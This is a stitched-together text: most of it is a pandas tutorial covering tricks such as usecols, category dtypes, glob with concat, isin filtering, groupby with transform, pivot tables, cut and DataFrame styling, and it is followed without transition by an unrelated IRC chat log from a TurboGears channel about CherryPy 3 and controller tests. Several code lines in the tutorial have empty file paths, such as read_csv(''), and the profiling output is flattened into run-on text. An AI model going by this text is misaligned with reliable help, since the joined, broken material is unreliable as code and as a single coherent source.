with the "usecols" parameter: cols = ['beer_servings', 'continent'] small_drinks = pd.read_csv('', usecols=cols) small_drinks.info(memory_usage='deep') <class 'pandas.core.frame.DataFrame'> RangeIndex: 193 entries, 0 to 192 Data columns (total 2 columns): beer_servings 193 non-null int64 continent 193 non-null object dtypes: int64(1), object(1) memory usage: 13.6 KB By only reading in these two columns, we've reduced the DataFrame size to 13.6 KB. The second step is to convert any object columns containing categorical data to the category data type, which we specify with the "dtype" parameter: dtypes = {'continent':'category'} smaller_drinks = pd.read_csv('', usecols=cols, dtype=dtypes) smaller_drinks.info(memory_usage='deep') <class 'pandas.core.frame.DataFrame'> RangeIndex: 193 entries, 0 to 192 Data columns (total 2 columns): beer_servings 193 non-null int64 continent 193 non-null category dtypes: category(1), int64(1) memory usage: 2.3 KB By reading in the continent column as the category data type, we've further reduced the DataFrame size to 2.3 KB. Keep in mind that the category data type will only reduce memory usage if you have a small number of categories relative to the number of rows. Let's say that your dataset is spread across multiple files, but you want to read the dataset into a single DataFrame. For example, I have a small dataset of stock data in which each CSV file only includes a single day. Here's the first day: pd.read_csv('data/stocks1.csv') Here's the second day: pd.read_csv('data/stocks2.csv') And here's the third day: pd.read_csv('data/stocks3.csv') You could read each CSV file into its own DataFrame, combine them together, and then delete the original DataFrames, but that would be memory inefficient and require a lot of code. A better solution is to use the built-in glob module: from glob import glob You can pass a pattern to glob(), including wildcard characters, and it will return a list of all files that match that pattern. In this case, glob is looking in the "data" subdirectory for all CSV files that start with the word "stocks": stock_files = sorted(glob('data/stocks*.csv')) stock_files ['data/stocks1.csv', 'data/stocks2.csv', 'data/stocks3.csv'] glob returns filenames in an arbitrary order, which is why we sorted the list using Python's built-in sorted() function. We can then use a generator expression to read each of the files using read_csv() and pass the results to the concat() function, which will concatenate the rows into a single DataFrame: pd.concat((pd.read_csv(file) for file in stock_files)) Unfortunately, there are now duplicate values in the index. To avoid that, we can tell the concat() function to ignore the index and instead use the default integer index: pd.concat((pd.read_csv(file) for file in stock_files), ignore_index=True) The previous trick is useful when each file contains rows from your dataset. But what if each file instead contains columns from your dataset? Here's an example in which the drinks dataset has been split into two CSV files, and each file contains three columns: pd.read_csv('data/drinks1.csv').head() pd.read_csv('data/drinks2.csv').head() Similar to the previous trick, we'll start by using glob(): drink_files = sorted(glob('data/drinks*.csv')) And this time, we'll tell the concat() function to concatenate along the columns axis: pd.concat((pd.read_csv(file) for file in drink_files), axis='columns').head() Now our DataFrame has all six columns. Let's say that you have some data stored in an Excel spreadsheet or a Google Sheet, and you want to get it into a DataFrame as quickly as possible. Just select the data and copy it to the clipboard. Then, you can use the read_clipboard() function to read it into a DataFrame: df = pd.read_clipboard() df Just like the read_csv() function, read_clipboard() automatically detects the correct data type for each column: df.dtypes Column A int64 Column B float64 Column C object dtype: object Let's copy one other dataset to the clipboard: df = pd.read_clipboard() df Amazingly, pandas has even identified the first column as the index: df.index Index(['Alice', 'Bob', 'Charlie'], dtype='object') Keep in mind that if you want your work to be reproducible in the future, read_clipboard() is not the recommended approach. Let's say that you want to split a DataFrame into two parts, randomly assigning 75% of the rows to one DataFrame and the other 25% to a second DataFrame. For example, we have a DataFrame of movie ratings with 979 rows: len(movies) 979 We can use the sample() method to randomly select 75% of the rows and assign them to the "movies_1" DataFrame: movies_1 = movies.sample(frac=0.75, random_state=1234) Then we can use the drop() method to drop all rows that are in "movies_1" and assign the remaining rows to "movies_2": movies_2 = movies.drop(movies_1.index) You can see that the total number of rows is correct: len(movies_1) + len(movies_2) 979 And you can see from the index that every movie is in either "movies_1": movies_1.index.sort_values() Int64Index([ 0, 2, 5, 6, 7, 8, 9, 11, 13, 16, ... 966, 967, 969, 971, 972, 974, 975, 976, 977, 978], dtype='int64', length=734) ...or "movies_2": movies_2.index.sort_values() Int64Index([ 1, 3, 4, 10, 12, 14, 15, 18, 26, 30, ... 931, 934, 937, 941, 950, 954, 960, 968, 970, 973], dtype='int64', length=245) Keep in mind that this approach will not work if your index values are not unique. Let's take a look at the movies DataFrame: movies.head() One of the columns is genre: movies.genre.unique() array(['Crime', 'Action', 'Drama', 'Western', 'Adventure', 'Biography', 'Comedy', 'Animation', 'Mystery', 'Horror', 'Film-Noir', 'Sci-Fi', 'History', 'Thriller', 'Family', 'Fantasy'], dtype=object) If we wanted to filter the DataFrame to only show movies with the genre Action or Drama or Western, we could use multiple conditions separated by the "or" operator: movies[(movies.genre == 'Action') | (movies.genre == 'Drama') | (movies.genre == 'Western')].head() However, you can actually rewrite this code more clearly by using the isin() method and passing it a list of genres: movies[movies.genre.isin(['Action', 'Drama', 'Western'])].head() And if you want to reverse this filter, so that you are excluding (rather than including) those three genres, you can put a tilde in front of the condition: movies[~movies.genre.isin(['Action', 'Drama', 'Western'])].head() This works because tilde is the "not" operator in Python. Let's say that you needed to filter the movies DataFrame by genre, but only include the 3 largest genres. We'll start by taking the value_counts() of genre and saving it as a Series called counts: counts = movies.genre.value_counts() counts Drama 278 Comedy 156 Action 136 Crime 124 Biography 77 Adventure 75 Animation 62 Horror 29 Mystery 16 Western 9 Sci-Fi 5 Thriller 5 Film-Noir 3 Family 2 Fantasy 1 History 1 Name: genre, dtype: int64 The Series method nlargest() makes it easy to select the 3 largest values in this Series: counts.nlargest(3) Drama 278 Comedy 156 Action 136 Name: genre, dtype: int64 And all we actually need from this Series is the index: counts.nlargest(3).index Index(['Drama', 'Comedy', 'Action'], dtype='object') Finally, we can pass the index object to isin(), and it will be treated like a list of genres: movies[movies.genre.isin(counts.nlargest(3).index)].head() Thus, only Drama and Comedy and Action movies remain in the DataFrame. Let's look at a dataset of UFO sightings: ufo.head() You'll notice that some of the values are missing. To find out how many values are missing in each column, you can use the isna() method and then take the sum(): ufo.isna().sum() City 25 Colors Reported 15359 Shape Reported 2644 State 0 Time 0 dtype: int64 isna() generated a DataFrame of True and False values, and sum() converted all of the True values to 1 and added them up. Similarly, you can find out the percentage of values that are missing by taking the mean() of isna(): ufo.isna().mean() City 0.001371 Colors Reported 0.842004 Shape Reported 0.144948 State 0.000000 Time 0.000000 dtype: float64 If you want to drop the columns that have any missing values, you can use the dropna() method: ufo.dropna(axis='columns').head() Or if you want to drop columns in which more than 10% of the values are missing, you can set a threshold for dropna(): ufo.dropna(thresh=len(ufo)*0.9, axis='columns').head() len(ufo) returns the total number of rows, and then we multiply that by 0.9 to tell pandas to only keep columns in which at least 90% of the values are not missing. Let's create another example DataFrame: df = pd.DataFrame({'name':['John Arthur Doe', 'Jane Ann Smith'], 'location':['Los Angeles, CA', 'Washington, DC']}) df What if we wanted to split the "name" column into three separate columns, for first, middle, and last name? We would use the str.split() method and tell it to split on a space character and expand the results into a DataFrame: df.name.str.split(' ', expand=True) These three columns can actually be saved to the original DataFrame in a single assignment statement: df[['first', 'middle', 'last']] = df.name.str.split(' ', expand=True) df What if we wanted to split a string, but only keep one of the resulting columns? For example, let's split the location column on "comma space": df.location.str.split(', ', expand=True) If we only cared about saving the city name in column 0, we can just select that column and save it to the DataFrame: df['city'] = df.location.str.split(', ', expand=True)[0] df Let's create another example DataFrame: df = pd.DataFrame({'col_one':['a', 'b', 'c'], 'col_two':[[10, 40], [20, 50], [30, 60]]}) df There are two columns, and the second column contains regular Python lists of integers. If we wanted to expand the second column into its own DataFrame, we can use the apply() method on that column and pass it the Series constructor: df_new = df.col_two.apply(pd.Series) df_new And by using the concat() function, you can combine the original DataFrame with the new DataFrame: pd.concat([df, df_new], axis='columns') Let's look at a DataFrame of orders from the Chipotle restaurant chain: orders.head(10) Each order has an order_id and consists of one or more rows. To figure out the total price of an order, you sum the item_price for that order_id. For example, here's the total price of order number 1: orders[orders.order_id == 1].item_price.sum() 11.56 If you wanted to calculate the total price of every order, you would groupby() order_id and then take the sum of item_price for each group: orders.groupby('order_id').item_price.sum().head() order_id 1 11.56 2 16.98 3 12.67 4 21.00 5 13.70 Name: item_price, dtype: float64 However, you're not actually limited to aggregating by a single function such as sum(). To aggregate by multiple functions, you use the agg() method and pass it a list of functions such as sum() and count(): orders.groupby('order_id').item_price.agg(['sum', 'count']).head() That gives us the total price of each order as well as the number of items in each order. Let's take another look at the orders DataFrame: orders.head(10) What if we wanted to create a new column listing the total price of each order? Recall that we calculated the total price using the sum() method: orders.groupby('order_id').item_price.sum().head() order_id 1 11.56 2 16.98 3 12.67 4 21.00 5 13.70 Name: item_price, dtype: float64 sum() is an aggregation function, which means that it returns a reduced version of the input data. In other words, the output of the sum() function: len(orders.groupby('order_id').item_price.sum()) 1834 ...is smaller than the input to the function: len(orders.item_price) 4622 The solution is to use the transform() method, which performs the same calculation but returns output data that is the same shape as the input data: total_price = orders.groupby('order_id').item_price.transform('sum') len(total_price) 4622 We'll store the results in a new DataFrame column called total_price: orders['total_price'] = total_price orders.head(10) As you can see, the total price of each order is now listed on every single line. That makes it easy to calculate the percentage of the total order price that each line represents: orders['percent_of_total'] = orders.item_price / orders.total_price orders.head(10) Let's take a look at another dataset: titanic.head() This is the famous Titanic dataset, which shows information about passengers on the Titanic and whether or not they survived. If you wanted a numerical summary of the dataset, you would use the describe() method: titanic.describe() However, the resulting DataFrame might be displaying more information than you need. If you wanted to filter it to only show the "five-number summary", you can use the loc accessor and pass it a slice of the "min" through the "max" row labels: titanic.describe().loc['min':'max'] And if you're not interested in all of the columns, you can also pass it a slice of column labels: titanic.describe().loc['min':'max', 'Pclass':'Parch'] The Titanic dataset has a "Survived" column made up of ones and zeros, so you can calculate the overall survival rate by taking a mean of that column: titanic.Survived.mean() 0.3838383838383838 If you wanted to calculate the survival rate by a single category such as "Sex", you would use a groupby(): titanic.groupby('Sex').Survived.mean() Sex female 0.742038 male 0.188908 Name: Survived, dtype: float64 And if you wanted to calculate the survival rate across two different categories at once, you would groupby() both of those categories: titanic.groupby(['Sex', 'Pclass']).Survived.mean() Sex Pclass female 1 0.968085 2 0.921053 3 0.500000 male 1 0.368852 2 0.157407 3 0.135447 Name: Survived, dtype: float64 This shows the survival rate for every combination of Sex and Passenger Class. It's stored as a MultiIndexed Series, meaning that it has multiple index levels to the left of the actual data. It can be hard to read and interact with data in this format, so it's often more convenient to reshape a MultiIndexed Series into a DataFrame by using the unstack() method: titanic.groupby(['Sex', 'Pclass']).Survived.mean().unstack() This DataFrame contains the same exact data as the MultiIndexed Series, except that now you can interact with it using familiar DataFrame methods. If you often create DataFrames like the one above, you might find it more convenient to use the pivot_table() method instead: titanic.pivot_table(index='Sex', columns='Pclass', values='Survived', aggfunc='mean') With a pivot table, you directly specify the index, the columns, the values, and the aggregation function. An added benefit of a pivot table is that you can easily add row and column totals by setting margins=True: titanic.pivot_table(index='Sex', columns='Pclass', values='Survived', aggfunc='mean', margins=True) This shows the overall survival rate as well as the survival rate by Sex and Passenger Class. Finally, you can create a cross-tabulation just by changing the aggregation function from "mean" to "count": titanic.pivot_table(index='Sex', columns='Pclass', values='Survived', aggfunc='count', margins=True) This shows the number of records that appear in each combination of categories. Let's take a look at the Age column from the Titanic dataset: titanic.Age.head(10) 0 22.0 1 38.0 2 26.0 3 35.0 4 35.0 5 NaN 6 54.0 7 2.0 8 27.0 9 14.0 Name: Age, dtype: float64 It's currently continuous data, but what if you wanted to convert it into categorical data? One solution would be to label the age ranges, such as "child", "young adult", and "adult". The best way to do this is by using the cut() function: pd.cut(titanic.Age, bins=[0, 18, 25, 99], labels=['child', 'young adult', 'adult']).head(10) 0 young adult 1 adult 2 adult 3 adult 4 adult 5 NaN 6 adult 7 child 8 adult 9 child Name: Age, dtype: category Categories (3, object): [child < young adult < adult] This assigned each value to a bin with a label. Ages 0 to 18 were assigned the label "child", ages 18 to 25 were assigned the label "young adult", and ages 25 to 99 were assigned the label "adult". Notice that the data type is now "category", and the categories are automatically ordered. Let's take another look at the Titanic dataset: titanic.head() Notice that the Age column has 1 decimal place and the Fare column has 4 decimal places. What if you wanted to standardize the display to use 2 decimal places? You can use the set_option() function: pd.set_option('display.float_format', '{:.2f}'.format) The first argument is the name of the option, and the second argument is a Python format string. titanic.head() You can see that Age and Fare are now using 2 decimal places. Note that this did not change the underlying data, only the display of the data. You can also reset any option back to its default: pd.reset_option('display.float_format') There are many more options you can specify is a similar way. The previous trick is useful if you want to change the display of your entire notebook. However, a more flexible and powerful approach is to define the style of a particular DataFrame. Let's return to the stocks DataFrame: stocks We can create a dictionary of format strings that specifies how each column should be formatted: format_dict = {'Date':'{:%m/%d/%y}', 'Close':'${:.2f}', 'Volume':'{:,}'} And then we can pass it to the DataFrame's style.format() method: stocks.style.format(format_dict) Notice that the Date is now in month-day-year format, the closing price has a dollar sign, and the Volume has commas. We can apply more styling by chaining additional methods: (stocks.style.format(format_dict) .hide_index() .highlight_min('Close', color='red') .highlight_max('Close', color='lightgreen') ) We've now hidden the index, highlighted the minimum Close value in red, and highlighted the maximum Close value in green. Here's another example of DataFrame styling: (stocks.style.format(format_dict) .hide_index() .background_gradient(subset='Volume', cmap='Blues') ) The Volume column now has a background gradient to help you easily identify high and low values. And here's one final example: (stocks.style.format(format_dict) .hide_index() .bar('Volume', color='lightblue', align='zero') .set_caption('Stock Prices from October 2016') ) There's now a bar chart within the Volume column and a caption above the DataFrame. Note that there are many more options for how you can style your DataFrame. Let's say that you've got a new dataset, and you want to quickly explore it without too much work. There's a separate package called pandas-profiling that is designed for this purpose. First you have to install it using conda or pip. Once that's done, you import pandas_profiling: import pandas_profiling Then, simply run the ProfileReport() function and pass it any DataFrame. It returns an interactive HTML report: pandas_profiling.ProfileReport(titanic) Dataset info Variables types Warnings Agehas 177 / 19.9% missing values Missing Cabinhas 687 / 77.1% missing values Missing Cabinhas a high cardinality: 148 distinct values Warning Farehas 15 / 1.7% zeros Zeros Parchhas 678 / 76.1% zeros Zeros SibSphas 608 / 68.2% zeros Zeros Tickethas a high cardinality: 681 distinct values Warning Age Numeric Quantile statistics Descriptive statistics Minimum 5 values Maximum 5 values Cabin Categorical Embarked Categorical Fare Numeric Quantile statistics Descriptive statistics Minimum 5 values Maximum 5 values Name Categorical, Unique First 10 values Last 10 values Parch Numeric Quantile statistics Descriptive statistics Minimum 5 values Maximum 5 values PassengerId Numeric Quantile statistics Descriptive statistics Minimum 5 values Maximum 5 values Pclass Numeric Quantile statistics Descriptive statistics Minimum 5 values Maximum 5 values Sex Categorical SibSp Numeric Quantile statistics Descriptive statistics Minimum 5 values Maximum 5 values Survived Boolean Ticket Categorical
https://nbviewer.jupyter.org/github/justmarkham/pandas-videos/blob/master/top_25_pandas_tricks.ipynb?utm_campaign=Data_Elixir&utm_source=Data_Elixir_242
CC-MAIN-2019-43
refinedweb
4,727
56.35
AtomPub in the .NET World - | - - - - - - Read later Reading List A note to our readers: You asked so we have developed a set of features that allow you to reduce the noise: you can get email and web notifications for topics you are interested in. Learn more about our new features.. BlogSvc.net is an open source project hosted on CodePlex and started by Jarret Vance: BlogSvc is an open source implementation of the Atom Publishing Protocol. It is built on top of a provider model. There are providers for the file system and databases. The service is compatible with Live Writer. BlogSvc is written in C# 3.5, uses the new web programming model in WCF, and relies heavily on LINQ and other new language features. BlogSvc can be used with or without IIS. Since BlogSvc.net has been written before the official release of .NET 3.5 SP1, it provides its own implementation of a syndication object model. As Steve Maine has announced, Microsoft also “added strongly-typed OM for all of the constructs defined in the Atom Publishing Protocol specification (like ServiceDocument and Workspaces) and put them in the System.ServiceModel.Syndication namespace”. Steve and Scott Hanselman point out that Jarret might profit from the ServiceDocument and Workspace classes, i.e. the syndication object model in System.ServiceModel.Syndication, and “be able to remove most of his "BlogService.Core" project”. Read the details in Scott’s article, which also offers a brief analysis of BlogSvc.net’s code. In spite of many articles, which partially reduce BlogSvc.net and Syndication/AtomPub support in .NET Framework 3.5 (SP1) to a means of implementing content management systems or blog engines, AtomPub offers a much wider area of application. In an interview, available on InfoQ, Dan Diephouse talks about the benefits of using the Atom Pub and Atom standards for business applications. Rate this Article - Editor Review - Chief Editor Action
https://www.infoq.com/news/2008/08/atompub-dotnet
CC-MAIN-2018-22
refinedweb
320
58.08
A enhanced data model, which includes named groups. Groups, like directories in a Unix file system, are hierarchically organized, to arbitrary depth. They can be used to organize large numbers of variables. The default group type allows the user to read and write arrays of variable length values. Variables, groups, and types share a namespace. Within the same group, variables, format files. only one dimension in a classic The CDF-1 and 2 files, only the original six types are available (byte, character, short, int, float, and double). CDF-5 adds unsigned byte, unsigned short, unsigned int, 64-bit int, and unsigned 64-bit int. In netCDF-4, variables may also use these additional data types, plus the string data type. Or the user may define a type, as an opaque blob of bytes, as an array of variable length arrays, or as a compound type, which acts like a C struct. (See Data Types). In the CDL notation, classic data for variables with dimensions, or for scalar variables. In the above CDL example there are six variables. As discussed below, four of these are coordinate variables (See for a variable attribute, or for a global attribute. Syntax). syntax. In the netCDF example (see The Appendix A: Attribute Conventions. Attributes may be added to a netCDF dataset long after it is first defined, so you don't have to anticipate all potentially useful attributes. However adding new attributes to an existing classic format dataset can incur the same expense as copying the dataset. For a more extensive discussion see File Structure and Performance... Beginning with versions 3.6.3 and 4.0, names may also include UTF-8 encoded Unicode characters as well as other special characters, except for the character '/', which may not appear in a name. Names that have trailing space characters are also not permitted. Case is significant in netCDF names. A zero-length name is not allowed. Names longer than NC_MAX_NAME will not be accepted any netCDF define function. An error of NC_EMAXNAME will be returned. All netCDF inquiry functions will return names of maximum size NC_MAX_NAME for netCDF files. Since this does not include the terminating NULL, space should be reserved for NC_MAX_NAME + 1 characters. Some widely used conventions restrict names to only alphanumeric characters or underscores. NetCDF classic. Brittany Spears performed the world-premire of her smash hit "Format me baby, one more time.". files (CDF-1, 2, and 5) using the PnetCDF library from Argonne/Northwestern, a new nc-config utility to help compile and link programs that use netCDF, inclusion of the UDUNITS library for handling provided a read-write interface to netCDF-3 classic format files, as well as a read-only interface to netCDF-4 enhanced model data and many other formats of scientific data through a common (CDM) interface. More recent releases support writing netCDF-4 data. The NetCDF-Java library also implements NcML, which allows you to add metadata to CDM datasets. A ToolsUI application is also included that provides a graphical user interface to capabilities similar to the C-based ncdump and ncgen utilities, as well as CF-compliance checking and many other features. Starting with version 4.1.1 the netCDF C libraries and utilities have supported remote data access. formats, we wish to read a cross-section of all the data for the temp variable at one level (say, the second), and assume that there are currently three records (time values) in the netCDF dataset. Recall that the dimensions are defined as and the variable temp is declared as in the CDL notation. A corresponding C variable that holds data for only one level might be declared as: to keep the data in a one-dimensional array, or. 3.4.3 More on General Array Section Access for C.
https://www.unidata.ucar.edu/software/netcdf/docs/netcdf_data_set_components.html
CC-MAIN-2019-13
refinedweb
634
64.61
Bug #11531open IPAddr#== implements wrong logic Description Description¶ IPAddr#== should implement the logic of comparison of two IPAddr instances. This generally means that it compares two IP addresses. Lets look at the code of this method: return @family == other.family && @addr == other.to_i It returns the result of comparison of the families and the addresses, but it should also compare the netmask which describes the network where this address is located. The code below shows the test case for this comparison: ip1 = IPAddr.new '195.51.100.0/24' ip2 = IPAddr.new '195.51.100.0/26' ip1 == ip2 #=> true This code shows that two identical IP addresses from different networks are equal. But the result should be false because these addresses are not identical. Possible solution¶ Depending on Feature #11210 i would propose following implementation of this method: def ==(other) other = coerce_other(other) return @family == other.family && @addr == other.to_i && @mask_addr == other.netmask end Updated by knu (Akinori MUSHA) over 4 years ago I think this is intentional. IPAddr represents an IP address, not an IP network, so it does not consider a difference in netmasks as significant. Updated by bjmllr (Ben Miller) over 4 years ago it does not consider a difference in netmasks as significant IPAddr.new isn't consistent with this principle: IPAddr.new("1.2.3.4/24") == IPAddr.new("1.2.3.4/32") # => false 1.2.3.4/24 is valid notation for a host address, yet IPAddr.new will drop the low-order bits to make it a valid network address: IPAddr.new("1.2.3.4/24") == IPAddr.new("1.2.3.0/24") # => true I'm not sure why we would want to have a netmask at all if IPAddr is only for host addresses. Updated by sahglie (Steven Hansen) over 4 years ago IPAddr represents an IP address, not an IP network, so it does not consider a difference in netmasks as significant. I disagree that IPAddr represents an IP address (I think a more accurately represents a CIDR block). To add to Ben's point: IPAddr.new('128.128.128.128').to_range.to_a # => [#<IPAddr: IPv4:128.128.128.128/255.255.255.255>] IPAddr.new('128.128.128.128/30').to_range.to_a # => [ #<IPAddr: IPv4:128.128.128.128/255.255.255.252>, #<IPAddr: IPv4:128.128.128.129/255.255.255.252>, #<IPAddr: IPv4:128.128.128.130/255.255.25│5.252>, #<IPAddr: IPv4:128.128.128.131/255.255.255.252> ] The fact that IPAddr accepts a CIDR block mean it represents 1 or more IPs. So an IPAddr with 1 IP should not be equal to an IPAddr with 4 IPs Updated by jeremyevans0 (Jeremy Evans) over 1 year ago I am not sure whether this is a bug. eql? considers the netmask, but == does not. So if you want to consider the netmask, you can currently use eql?. Changing == to be the same as eql? could cause backwards compatibility issues. The major problem is one of design, in that IPAddr can operate as either a specific IP address or as a network/CIDR-block. I think it would have been better to use separate classes for those two concepts, but that is not fixable with the current design. Updated by hsbt (Hiroshi SHIBATA) over 1 year ago - Assignee set to knu (Akinori MUSHA) - Status changed from Open to Assigned Also available in: Atom PDF
https://bugs.ruby-lang.org/issues/11531
CC-MAIN-2021-31
refinedweb
570
67.25
<3DC4A438.5010703@...> > * On the subject of "How to incorporate C-compiled function into CLISP (once upon a time was bytecode->C)" > * Sent on Sun, 03 Nov 2002 05:21:12 +0100 > * Honorable Stefan Kain <smk@...> writes: > > linking an object file is not enough. I have to introduce it to the > LISP-runtime. I have to find out how to create/update the symbol > SQUARE, update its function slot and somehow get a connection to the > object code in square.o (???). <> -- Sam Steingold () running RedHat8 GNU/Linux <> <> <> <> <> Hard work has a future payoff. Laziness pays off NOW. Hi Sam (and everybody else), I have hand-compiled a test example and would like to make it accessible in CLISP. my first example looks like this: ============================= #include "lispbibl.c" LISPFUNN(square, 1) { pushSTACK(STACK_(1)); pushSTACK(STACK_(2)); C_mal(2,args_end_pointer STACKop 2); skipSTACK(2); return; } ============================= Following the instructions in the impnotes yields strange compilation errors in spvwd.d etc: - I add square to subr.d, constsym.d init.lisp etc. square itself compiles without problems. But I do not get to the point where an image including SQUARE is dumped. But anyway, the described solution in the impnotes would work only statically. In a running system, I want to create a square.o and link it to the current program (on a C-runtime level so to speak). Furthermore I have to introduce it to the LISP runtime system. There are quite a few problems that I have with compiling real closures. How to represent the bound variables in the closure? The struct Cclosure does not help a lot, because it is based on object pointers. I cannot write an object pointer that is only valid in the lisp image at runtime to a C-file... So I have to emit code that does some kind of symbol maintainance ... My basic strategy for bytecode-compilation seems to work, but there are a lot of details I am even not yet aware of now! :-( Lots of the semantics in interpret_bytecode_ has to be tackled differently in a compiled C-function. That is why the stuff that I have written so far is currently non-operational: - I can excerpt the bytecode implementations from eval.d into emitter-functions automatically. But using these definitions literally does not work. I have to rewrite the code snippets for each bytecode in order to adapt them the "compiled context". Doing this manually is tedious. So I am currently working on a automated way of turning the "interpreter spec" (the famous switch-statement in interpret_bytecode) into something that can be used for compilations. (In theory this is simple. So I encounter the difference between theory and practice, now... :-)) My questions so far: linking an object file is not enough. I have to introduce it to the LISP-runtime. I have to find out how to create/update the symbol SQUARE, update its function slot and somehow get a connection to the object code in square.o (???). BTW, I am not a systems programmer. Does anybody remember the calls related to shared objects, that you use to read a library (shared object) and get a function pointer to the C-symbol that you have supplied, at runtime. I can't remember... Bye, Stefan I agree to receive quotes, newsletters and other information from sourceforge.net and its partners regarding IT services and products. I understand that I can withdraw my consent at any time. Please refer to our Privacy Policy or Contact Us for more details
https://sourceforge.net/p/clisp/mailman/message/12022674/
CC-MAIN-2016-44
refinedweb
586
66.33
Flask-Classy.ext.classy.FlaskView it doesn’t quite complete the picture by supporting methods that aren’t part of the typical CRUD operations for a given resource, or make it easy for me to override the route rules for particular view. And while flask.views.View does add some context, it requires a class for each view instead of letting me group very similar views for the same resource into a single class. “But my projects aren’t that big. Can Flask-Classy do anything else for me besides making a big project easier to manage?” Why yes. It does help a bit with some other things. For example, Flask-Classy will automatically generate routes based on the methods in your views, and makes it super simple to override those routes using Flask’s familiar decorator syntax. Install the extension with: $ pip install flask-classy or if you’re kickin’ it old-school: $ easy_install flask-classy If you’re like me, you probably get a better idea of how to use something when you see it being used. Let’s go ahead and create a little app to see how Flask-Classy works: from flask import Flask from flask.ext.classy-Classy will automatically create routes for any method in a FlaskView that doesn’t begin with an underscore character. You can still define your own routes of course, and we’ll look at that next..ext.classy. OK, So I don’t want to start inventing a new language (actually I’d love to invent a new language, just not right now...) for talking about URLs, but since Flask-Classy a prefix for the FlaskView, otherwise no prefix will be applied. The route base /great_base/ will always exist, either because it was inferred automatically from the name of the FlaskView class, or because you specified a route base to use. Note Flask-Classy favors putting trailing slashes at the end of routes without parameters. You can override this behavior by specifying trailing_slash=False either as an attribute of your FlaskView or in the register method. Classy. Using an attribute is a great way to define a default prefix, as you can always override this value when you register the FlaskView with your app: class BurgundyView(FlaskView): route_prefix = '/colors/' def index(self): ... There are 2 ways to customize the base route of a FlaskView. (Well technically there are 3 if you count changing the name of the class but that’s hardly a reasonable way to go about it.): So I guess I have to break the narrative a bit here so I can take some time to talk about Flask-Classy‘s‘s very special method names: Woah... you’ve seen this one before! Remember way back at the beginning? Oh nevermind. So index is generally used for home pages and lists of resources. The automatically generated route is: Another old familiar friend, get is usually used to retrieve a specific resource. The automatically generated route is: This method is generally used for creating new instances of a resource but can really be used to handle any posted data you want. The automatically generated route is: For those of us using REST this one is really helpful. It’s generally used to update a specific resource. The automatically generated route is: Similar to put, patch is used for updating a resource. Unlike put however you only send the parts of the resource you want changed, instead of doing a complete replacement of the resource. The automatically generated route is: More RESTfulness. It’s the most self explanatory of all the RESTful methods, and it’s commonly used to destroy a specific resource. The automatically generated route is:-Classy it’s. So if you’re like me (and who isn’t?), you think that FlaskViews-Classy will take care of the rest: class WhataGreatView(FlaskView): decorators = [login_required] def this_is_secret(self): return "If you see this, you're logged in." def so_is_this(self): return "Looking at me? I guess you're logged in." Hey, remember that time when you made that big ‘ol Flask app and then had those @app.before_reqeust and @app.after_request decorated methods? Remember how you only wanted some of them to run for certain views so you had all those if view == the_one_I_care_about: statements and stuff? Yuck. I’ve been there too, and I think you might like how Flask-Classy addresses this very touchy issue. FlaskView will look for wrapper methods when your request is being processed so that you can create more fine grained “before and after” processing methods. So there you are, eating a delicious Strawberry Frosted Pop Tart one morning, thinking about the awesome Flask-Classy-Classy because adding tracking is going to be a snap: from flask.ext.classy-Classy consultant when suddenly: “I really only care about when widgets are created and retrieved!” Yep, you’ve got a granularity problem. Not to worry though because Flask-Classy is happy to let you know that it has smart wrapper methods too. Let’s say for example you wanted to run something before the index view runs? Just create a method called before_index and Flask-Classy will make sure it gets run only before that view. (as you have guessed by now, after_index will be run only after the index view). from flask.ext.classy): ... Just to be certain, let’s go ahead and review the methods you can write to wrap your views: Will be called before any view in this FlaskView is called. Will be called before the view specified <view_method> is called. Will be called after any view in this FlaskView is called. You must return either the passed in response or a new response. Will be called after the <view_method> is called. You must return either the passed in response or a new response. Wrapper methods are called in the same order every time. “How predictable.” you’re thinking. (You’re starting to sound like my ex, sheesh.) I prefer the term reliable. By now, you’ve built a few hundred Flask apps using Flask-Classy and you probably think you’re an expert. But not until you’ve tried the snazzy Subdomains feature my friend. Flask-Classy-Classy you have some options. There are two easy ways you can choose from to tell Flask-Classy which subdomains your FlaskView should respond to. Let’s see both methods so you can choose which one works best for your application. Probably the most flexible method, you can define which subdomains you want to support at the same time you’re registering your views: # views.py from flask.ext.classy() Using this method, you can explicitly define a subdomain as an attribute of the FlaskView subclass: # views.py from flask.ext.classy. Feel free to ping me on twitter @apiguy, or head on over to the github repo at so you can join the fun. Base view for any class based views implemented with Flask-Classy. Will automatically configure routes when registered with a Flask app instance. Creates a unique route name based on the combination of the class name with the method name. Creates a routing rule based on either the class name (minus the ‘View’ suffix) or the defined route_base attribute of the class Returns the route base to use for the current class. Creates a proxy function that can be used by Flasks routing. The proxy instantiates the FlaskView subclass and calls the appropriate method. Extracts subdomain and endpoint values from the options dict and returns them along with a new dict without those values. Registers a FlaskView class for use with a specific instance of a Flask app. Any methods not prefixes with an underscore are candidates to be routed and will have routes registered when this method is called. A decorator that is used to define custom routes for methods in FlaskView subclasses. The format is exactly the same as Flask’s @app.route decorator.
https://pythonhosted.org/Flask-Classy/
CC-MAIN-2018-17
refinedweb
1,330
72.46
[08:49] *** now talking in #turbogears [08:49] *** topic is TurboGears: | Paste bin: | IRC Log: | TurboGears 1.0.2.2 is out. get it while it's hot [08:49] *** set by elvelind on Tue May 08 09:28:14 2007 [08:49] *** channel #turbogears mode is +tnc [08:49] *** channel created at Sat Nov 25 22:42:40 2006 [08:49] <mramm> removing cherrypy references isn't the goal at all [08:49] <mramm> It's just that we cp3 changed thngs so that we can't run tests the same way. [08:51] <mramm> fu_man_chu: I have a question for you if you have time... [08:54] <mramm> alberto posted this example code: which doesn't work as he expected it to becasue cp3 uses SCRIPT_NAME rather than PATH_INFO as the key in the config. I assume that there's a reason behind the diff between the way the tree works and the way that alberto expected it to work. [08:56] <chrismiles> ok I meant remove some cherrypy references, such as referring to cherrypy.resonse (although albertov will add some backwards compatibility for that, it won't be recommended) [08:56] <albertov> chrismiles: A port of the controller_tests to the new interface would be great and appreciated (since that, eventually, is the way to go) however, I'll try to make the former tests work with as little change as possible just to make sure we can emulate the old API so migration of other apps is easier (how on earth would you trust that your 1.0 app works in 1.1 if most of your controller tests break?? :) [08:56] <mramm> Yea, that makes sense [08:57] <mramm> It will also be good to have the new tests as an example of the new interface. [08:58] <chrismiles> that's what I am working on, a port of controller_tests to work with fixture. if that's not useful, certainly say so and I'll tackle something more worthwhile. [08:58] <albertov> chrismiles: Ths might help: [08:58] <albertov> that's how pylons initializes the TestApp in the base TestCase for controller tests.... [08:59] <albertov> chrismiles: we could even subclass TestApp in TG to provide some goodies in the future (BrowserSession, etc...) [09:00] 